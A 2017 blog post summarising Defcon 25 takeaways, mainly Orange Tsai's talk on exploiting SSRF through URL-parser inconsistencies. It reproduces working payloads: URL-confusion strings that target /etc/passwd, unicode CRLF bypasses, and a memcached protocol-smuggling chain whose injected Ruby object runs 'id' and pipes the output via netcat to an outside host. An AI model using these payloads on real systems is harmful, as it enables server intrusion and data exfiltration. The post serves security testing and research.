Sunday, July 30, 2017

Defcon 25 Takeaways

This July I had the pleasure of attending Defcon anniversary 25th time and these are my take-aways from the conference.

My goal when going to Defcon is to get inspired and motivated by the great work of others and to be able to incorporate new ideas and techniques into existing work. There is a myriad of great work being presented or taught at Defcon and it is overwhelming to take it all in. Especially when adding in the masses of people lining up and wandering around making a semi-introvert wanna crawl back into bed..

Notable presentations:

This little gem presents techniques for finding and exploiting SSRF which are directly applicable in testing applications. Abusing the discrepancy between RFCs 2396 and 3986 in libraries Orange Tsai has found that many libraries are vulnerable to these tricks in different situations. This results in payloads like the following:

http://foo@evil.com:80@google.com/
http://hackallthethings.xyz/-*/etc/passwd
http://hackallthethings.xyz/NN/etc/passwd

Note that the -* characters are actually unicode characters for %0d and %0a which break the NodeJS protection against CRLF injection.

python
>>> print(u'\uff0d')
-
>>> print(u'\uff0a')
*
>>> print(u'\uff2e')
N

List of unicode characters here

Another example that abuses decimal support in gethostbyname() (RFC1035):

>>> print host
\o\r\a\n\g\e.t\w
>>> socket.gethostbyname(host)
'50.116.8.239'

Orange also chained SSRF to exploit internal services via protocol smuggling and libraries vulnerable to CRLF injection.

Example:

http://0:8000/composer/send_email
?to=orange@chroot.org&url=http://127.0.0.1:11211/%0D%0Aset%20githubproductionsearch/queries/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Acount%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB%07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A%06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult

There are tons of examples in this talk and I have yet to dig through them all and test them, but it’s definitely lots of stuff that will improve testing of SSRF and inspire new tricks and ideas.
Also there are some good references in this talk:
SSRF Bible

All content is available at the Defcon Media Server.